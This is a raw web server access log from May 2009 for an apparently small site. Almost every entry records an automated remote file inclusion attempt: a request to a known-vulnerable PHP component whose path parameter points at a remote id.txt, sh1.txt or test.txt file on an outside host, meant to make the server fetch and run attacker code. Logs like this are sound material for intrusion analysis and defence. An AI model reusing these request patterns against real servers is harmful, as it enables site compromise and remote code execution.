80.93.54.56 - - [31/May/2009:07:14:27 -0400] "GET /log/sdaglobal.org-access_log.1//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 320
80.93.54.56 - - [31/May/2009:07:14:28 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
80.93.54.56 - - [31/May/2009:07:14:28 -0400] "GET /log//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 293
210.188.218.41 - - [31/May/2009:07:14:45 -0400] "GET //add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 289
217.147.29.190 - - [31/May/2009:07:14:58 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 9432
217.147.29.190 - - [31/May/2009:07:14:58 -0400] "GET /log/sdaglobal.org-access_log/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 310
217.147.29.190 - - [31/May/2009:07:14:58 -0400] "GET /log/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 58316
213.246.62.35 - - [31/May/2009:07:15:03 -0400] "GET /log/sdaglobal.org-error_log.4/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 347
213.246.62.35 - - [31/May/2009:07:15:03 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 317
213.246.62.35 - - [31/May/2009:07:15:04 -0400] "GET /log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 321
217.147.29.190 - - [31/May/2009:07:15:08 -0400] "GET /log/sdaglobal.org-access_log.4/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 312
87.118.90.151 - - [31/May/2009:07:15:48 -0400] "GET /log/sdaglobal.org-access_log.1//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 320
87.118.90.151 - - [31/May/2009:07:15:49 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
87.118.90.151 - - [31/May/2009:07:15:49 -0400] "GET /log//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 293
87.118.90.151 - - [31/May/2009:07:16:20 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
116.36.213.166 - - [31/May/2009:07:16:45 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
116.36.213.166 - - [31/May/2009:07:16:45 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:07:16:48 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
80.93.54.56 - - [31/May/2009:07:16:55 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
87.118.90.151 - - [31/May/2009:07:16:57 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
80.93.54.56 - - [31/May/2009:07:17:39 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
116.36.213.166 - - [31/May/2009:07:18:12 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
116.36.213.166 - - [31/May/2009:07:18:20 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:07:18:23 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 364
210.188.218.41 - - [31/May/2009:07:18:34 -0400] "GET //add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 289
87.118.90.151 - - [31/May/2009:07:18:45 -0400] "GET /log/sdaglobal.org-access_log.1//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 320
87.118.90.151 - - [31/May/2009:07:18:45 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
87.118.90.151 - - [31/May/2009:07:18:46 -0400] "GET /log//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 293
112.175.141.41 - - [31/May/2009:07:20:02 -0400] "GET //include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 305
112.175.141.41 - - [31/May/2009:07:20:03 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 309
112.175.141.41 - - [31/May/2009:07:20:03 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 334
62.146.68.61 - - [31/May/2009:07:21:03 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 317
62.146.68.61 - - [31/May/2009:07:21:03 -0400] "GET /log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 321
62.146.68.61 - - [31/May/2009:07:21:03 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 350
62.146.68.61 - - [31/May/2009:07:21:08 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 317
62.146.68.61 - - [31/May/2009:07:21:08 -0400] "GET /log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 321
62.146.68.61 - - [31/May/2009:07:21:08 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 350
93.158.137.121 - - [31/May/2009:07:21:36 -0400] "GET /robots.txt HTTP/1.1" 404 291
93.158.137.121 - - [31/May/2009:07:21:36 -0400] "GET / HTTP/1.1" 200 9432
62.146.68.61 - - [31/May/2009:07:21:41 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 322
62.146.68.61 - - [31/May/2009:07:21:41 -0400] "GET /log/sdaglobal.org-access_log.4/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 322
62.146.68.61 - - [31/May/2009:07:22:22 -0400] "GET /log/sdaglobal.org-access_log.4/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 322
62.146.68.61 - - [31/May/2009:07:24:41 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 350
62.146.68.61 - - [31/May/2009:07:24:52 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 350
219.80.140.90 - - [31/May/2009:07:29:50 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
72.232.198.162 - - [31/May/2009:07:31:51 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 320
72.232.198.162 - - [31/May/2009:07:31:57 -0400] "GET /errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 291
72.232.198.162 - - [31/May/2009:07:32:02 -0400] "GET /log/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 295
62.146.68.61 - - [31/May/2009:07:32:12 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 200 9432
62.146.68.61 - - [31/May/2009:07:32:12 -0400] "GET /log//?_SERVER%5BDOCUMENT_ROOT%5D=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 200 58323
125.231.8.92 - - [31/May/2009:07:32:25 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
116.36.213.166 - - [31/May/2009:07:33:03 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
208.103.111.2 - - [31/May/2009:07:35:46 -0400] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 340
208.103.111.2 - - [31/May/2009:07:35:46 -0400] "GET /log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 344
116.36.213.166 - - [31/May/2009:07:37:00 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
213.246.62.35 - - [31/May/2009:07:37:01 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 334
213.246.62.35 - - [31/May/2009:07:37:01 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 309
213.246.62.35 - - [31/May/2009:07:37:02 -0400] "GET //include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305
62.146.68.61 - - [31/May/2009:07:41:31 -0400] "GET /?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 9432
62.146.68.61 - - [31/May/2009:07:41:32 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 314
62.146.68.61 - - [31/May/2009:07:41:32 -0400] "GET /log/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 58325
62.146.68.61 - - [31/May/2009:07:41:33 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/?sourcedir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 314
62.146.68.61 - - [31/May/2009:07:43:02 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 323
62.146.68.61 - - [31/May/2009:07:43:02 -0400] "GET /log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 327
62.146.68.61 - - [31/May/2009:07:43:02 -0400] "GET /log/sdaglobal.org-error_log.1//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 353
72.232.198.162 - - [31/May/2009:07:47:29 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 320
72.232.198.162 - - [31/May/2009:07:47:34 -0400] "GET /errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 291
72.232.198.162 - - [31/May/2009:07:47:39 -0400] "GET /log/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 295
213.246.62.35 - - [31/May/2009:07:47:50 -0400] "GET /log/sdaglobal.org-access_log.1/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 348
69.94.125.100 - - [31/May/2009:07:48:22 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
69.94.125.100 - - [31/May/2009:07:48:22 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 314
69.94.125.100 - - [31/May/2009:07:48:22 -0400] "GET /log/sdaglobal.org-access_log.1//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 341
69.94.125.100 - - [31/May/2009:07:48:52 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 314
69.94.125.100 - - [31/May/2009:07:48:52 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 343
69.94.125.100 - - [31/May/2009:07:48:52 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
69.94.125.100 - - [31/May/2009:07:48:59 -0400] "GET /log/sdaglobal.org-access_log.1//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 341
69.94.125.100 - - [31/May/2009:07:48:59 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
69.94.125.100 - - [31/May/2009:07:48:59 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 314
118.98.212.6 - - [31/May/2009:07:53:13 -0400] "GET /log/sdaglobal.org-access_log.1//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 341
118.98.212.6 - - [31/May/2009:07:53:13 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
118.98.212.6 - - [31/May/2009:07:53:13 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 314
62.146.68.61 - - [31/May/2009:07:54:25 -0400] "GET /inc/functions.inc.php?config[ppa_root_path]=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 302
62.146.68.61 - - [31/May/2009:07:54:25 -0400] "GET /log/inc/functions.inc.php?config[ppa_root_path]=http://russianwomenabroad.com/poll/include/test.txt??? HTTP/1.1" 404 306
213.246.62.35 - - [31/May/2009:07:54:46 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 325
112.175.141.41 - - [31/May/2009:07:55:37 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/bbs.lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 336
85.119.154.129 - - [31/May/2009:07:57:13 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 375
85.119.154.129 - - [31/May/2009:07:57:13 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 346
85.119.154.129 - - [31/May/2009:07:57:13 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 350
116.36.213.166 - - [31/May/2009:07:57:27 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:07:57:28 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 366
116.36.213.166 - - [31/May/2009:07:57:28 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 337
213.246.62.35 - - [31/May/2009:07:58:35 -0400] "GET //include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 305
213.246.62.35 - - [31/May/2009:07:58:35 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 309
213.246.62.35 - - [31/May/2009:07:58:35 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 334
62.146.68.61 - - [31/May/2009:07:59:02 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320
62.146.68.61 - - [31/May/2009:07:59:02 -0400] "GET /log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 324
62.146.68.61 - - [31/May/2009:07:59:02 -0400] "GET /log/sdaglobal.org-access_log.4/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 351
62.146.68.61 - - [31/May/2009:07:59:50 -0400] "GET /log/sdaglobal.org-error_log.4/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 350
121.165.73.157 - - [31/May/2009:08:02:04 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 291
121.165.73.157 - - [31/May/2009:08:02:04 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 320
121.165.73.157 - - [31/May/2009:08:02:05 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 320
121.165.73.157 - - [31/May/2009:08:02:05 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 291
121.165.73.157 - - [31/May/2009:08:02:05 -0400] "GET /log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 295
121.165.73.157 - - [31/May/2009:08:02:05 -0400] "GET /log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 295
213.246.62.35 - - [31/May/2009:08:03:03 -0400] "GET /log/sdaglobal.org-error_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 355
213.246.62.35 - - [31/May/2009:08:03:04 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 325
213.246.62.35 - - [31/May/2009:08:03:04 -0400] "GET /log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 329
121.165.73.157 - - [31/May/2009:08:04:09 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 322
121.165.73.157 - - [31/May/2009:08:04:23 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 322
72.232.198.162 - - [31/May/2009:08:04:41 -0400] "GET /log/sdaglobal.org-access_log.4/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 322
122.146.240.120 - - [31/May/2009:08:07:22 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
112.175.141.41 - - [31/May/2009:08:16:55 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 316
112.175.141.41 - - [31/May/2009:08:16:55 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 320
112.175.141.41 - - [31/May/2009:08:16:56 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 316
112.175.141.41 - - [31/May/2009:08:16:56 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 347
112.175.141.41 - - [31/May/2009:08:16:57 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 347
112.175.141.41 - - [31/May/2009:08:16:59 -0400] "GET /log/sdaglobal.org-access_log.4//guildbank/searcharrays.php?addonDir=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 339
112.175.141.41 - - [31/May/2009:08:17:03 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 320
72.232.198.162 - - [31/May/2009:08:17:52 -0400] "GET /log/sdaglobal.org-access_log.4/errors.php?error=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 322
112.175.141.41 - - [31/May/2009:08:21:12 -0400] "GET /log/sdaglobal.org-error_log//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 325
213.246.62.35 - - [31/May/2009:08:21:47 -0400] "GET /log//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 297
213.246.62.35 - - [31/May/2009:08:21:47 -0400] "GET /log/sdaglobal.org-access_log.1//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 324
213.246.62.35 - - [31/May/2009:08:21:52 -0400] "GET //include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 293
72.232.198.162 - - [31/May/2009:08:24:45 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 375
72.232.198.162 - - [31/May/2009:08:24:45 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 346
72.232.198.162 - - [31/May/2009:08:24:45 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 350
72.232.198.162 - - [31/May/2009:08:25:13 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 375
72.232.198.162 - - [31/May/2009:08:25:13 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 346
72.232.198.162 - - [31/May/2009:08:25:13 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 350
72.232.198.162 - - [31/May/2009:08:25:33 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 377
72.232.198.162 - - [31/May/2009:08:25:54 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 377
213.246.62.35 - - [31/May/2009:08:28:00 -0400] "GET /log/sdaglobal.org-access_log.1/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 328
213.246.62.35 - - [31/May/2009:08:28:00 -0400] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 297
213.246.62.35 - - [31/May/2009:08:28:01 -0400] "GET /log/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 301
213.246.62.35 - - [31/May/2009:08:33:24 -0400] "GET /log/sdaglobal.org-access_log.1/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 356
62.146.68.61 - - [31/May/2009:08:37:25 -0400] "GET /log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 325
